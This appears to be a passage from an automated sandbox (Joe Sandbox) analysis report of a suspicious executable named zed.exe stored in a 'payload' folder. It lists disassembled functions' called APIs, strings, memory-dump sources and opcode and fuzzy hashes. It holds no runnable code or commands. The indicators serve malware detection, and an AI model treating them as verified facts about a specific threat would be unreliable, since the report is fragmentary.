                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8418C16A28A4A41F720A725D520379E750EBA1FACF90433EEE4C8BAD5FF3CD5418711
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E5319046
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E531A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7E5322D22,?,?,?,00007FF7E5322D5F,?,?,00000000,00007FF7E5323225,?,?,?,00007FF7E5323157), ref: 00007FF7E531A95E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E531A948: GetLastError.KERNEL32(?,?,?,00007FF7E5322D22,?,?,?,00007FF7E5322D5F,?,?,00000000,00007FF7E5323225,?,?,?,00007FF7E5323157), ref: 00007FF7E531A968
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7E530CBA5), ref: 00007FF7E5319064
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                                • API String ID: 3580290477-3628291463
                                                                                                                                                                                                                                                • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                • Instruction ID: f60ffbea5c29ff411bd5df55294daab3ec59a583f63ea626c4793371a3d2dec8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4041A532A18A0A85E715BF319A602BDA795EB54FD8F85403BE94EC7B45CE3CD481C361
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                • Instruction ID: 8284bcc0bfe9949daeb3c9508920e83861a54893eeac7fe2ddf9b952146ebd5d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A41B432728A5981DB20AF65E4553A9A761FBA8B88F80413AEF4DC7794EF3CD401CB51
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                                • Instruction ID: 7d3dfcc60f084c2f10b07f6f97a49d7b244b92989c4085182b05ae1af1cb8cae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10210966A2864581EB20AB21D16437DB3A1FBA4F4CFC5413FD64D83294CF7CE5458B72
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                • Instruction ID: d66d7f15ec13f3aa6e864b6d9361f311369cbd6a400a7516a4dc687839d03e25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31115E36618B8582EB219F15E45035AB7E4FB98F8CF584235DB8D47768DF3CD5528B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                • Instruction ID: d3fd0ca3cdebf1894b4bc21c9ff3d6625be2c8558503eaaf994f41d1f36f7be8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F301842692860A86F720BF64947537EA3A0EF64B4CFC0003FD54DC2695DE3CE5048B36
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.3082479102.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd344f0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: L_^
                                                                                                                                                                                                                                                • API String ID: 0-2487015770
                                                                                                                                                                                                                                                • Opcode ID: 2f7ae983b2cf8e3795d8c88c81bb1aced570821870989283d603bd7ab56901e1
                                                                                                                                                                                                                                                • Instruction ID: e42ee2bfd6c7c4b653c13f9730abaa4040847d0ebb882cc4753a37fddd2f5ed7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f7ae983b2cf8e3795d8c88c81bb1aced570821870989283d603bd7ab56901e1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58F1D531A08A4D8FEB98EF5CC4A5AE977E1FF59300F15017AD409D7296DA68EC82C780
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.3082815515.00007FFD345C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd345c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 982e9ab42470dbd598c90a23d202a65edc39f61b35a7cc83fe4c27f7addcc9dd
                                                                                                                                                                                                                                                • Instruction ID: 5ef1444d0e511b943dc32282376dd9783a0978e9912950871ac2d87c988bf3b3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 982e9ab42470dbd598c90a23d202a65edc39f61b35a7cc83fe4c27f7addcc9dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E31E432F0DA894FEB96EA6C94A15BCB7E1EF4A354F1801BBD18DC7183DA19AC01D740
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.3082815515.00007FFD345C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd345c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b9530894ed0a78c2f9e7848179c29bc54e2040245b8f94bf79858f3c1ce3f0fe
                                                                                                                                                                                                                                                • Instruction ID: 31dcb870bc52f850a0b2d2493a73c2176904ac445e48dd803e7fcddfe4ac1e22
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9530894ed0a78c2f9e7848179c29bc54e2040245b8f94bf79858f3c1ce3f0fe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0011C636F0D6494FEB56DA5990E056CBBD1EF5A310B1401BEC14DD7183DA29AC41C741
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.3082479102.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd344f0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                • Instruction ID: 92a57740b7b939f2dbda009bc023ce1ded5c1487c25296962d2f50f11849e90b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5001447121CB084FD744EF0CE451AA9B7E0FB95364F50056DE58AC3665D636E881CB45
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Mem_$FreeSubtypeType_$DataErr_FromKindMallocMemoryReallocUnicode_
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3719493655-0
                                                                                                                                                                                                                                                • Opcode ID: 0b61fa8abd9dfcdf7751d429d18c280f61a1d7a5a4373fae919a70ebd3257318
                                                                                                                                                                                                                                                • Instruction ID: f2a508699406121178c4c21c8e01cc41c81e5fae10828a3ff8dd3dde341b448d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b61fa8abd9dfcdf7751d429d18c280f61a1d7a5a4373fae919a70ebd3257318
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4020272B0E682A2E7BCDB14D4347FD27A1FB45788F5461B1D64E86694EE2DE440E300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                                                • Opcode ID: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                                • Instruction ID: 52791033f09f0ec56279d72001f2aa4d4e7d897fc39300eb763884ed026a614e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49316F7270AB8196EBB48F64E8603EE33A0FB48748F44603ADA4E47B95DF38D558C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139299733-0
                                                                                                                                                                                                                                                • Opcode ID: bb7a1583b311f9023fc161d2ea2417430d383a05e2e7d543d3dd2600494f88aa
                                                                                                                                                                                                                                                • Instruction ID: 9a56da67cd0f3abf7b4cdf3d43815a0fb6eb881c6ec13934b4457f7ee440d092
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb7a1583b311f9023fc161d2ea2417430d383a05e2e7d543d3dd2600494f88aa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1E1A8B2F0E652A1EBBCDB15E474BBD66A1FB50758F1431B1DA4F82680DE2CE851E700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CompareUnicode_$DeallocStringWith
                                                                                                                                                                                                                                                • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                                                • API String ID: 1004266020-3528878251
                                                                                                                                                                                                                                                • Opcode ID: 1585b7f006c3bc3ef317b73109392006e48ef7fb1c9bb5363a1940f6ac4bfac5
                                                                                                                                                                                                                                                • Instruction ID: 21025f7f5c922daf5d7e625953c66971b71c5db580fe410a32770a05e9a6a4bb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1585b7f006c3bc3ef317b73109392006e48ef7fb1c9bb5363a1940f6ac4bfac5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D415221B0EA42A1EAAC9B15A5743BDA7A2BF45BC8F94A0B5CD4E47754DF3DE044E300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Module_$DeallocObjectObject_$ConstantFromSpecStringTrackTypeType_
                                                                                                                                                                                                                                                • String ID: 15.0.0$_ucnhash_CAPI$ucd_3_2_0$unidata_version
                                                                                                                                                                                                                                                • API String ID: 2663085338-4141011787
                                                                                                                                                                                                                                                • Opcode ID: 35f2a36de3bf8fc04aa01d781381661ddda8c4355416510f682401fb826b2ab5
                                                                                                                                                                                                                                                • Instruction ID: 35cb9575cfcb6902e8760c1320d7276cbd91067d9b2dd8b479fda346fcebdfe5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35f2a36de3bf8fc04aa01d781381661ddda8c4355416510f682401fb826b2ab5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2431E321F0AA03A1E7BD5B25D8343FD26A1BF49B98F5470B0D90E466D5DF6CE444E300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
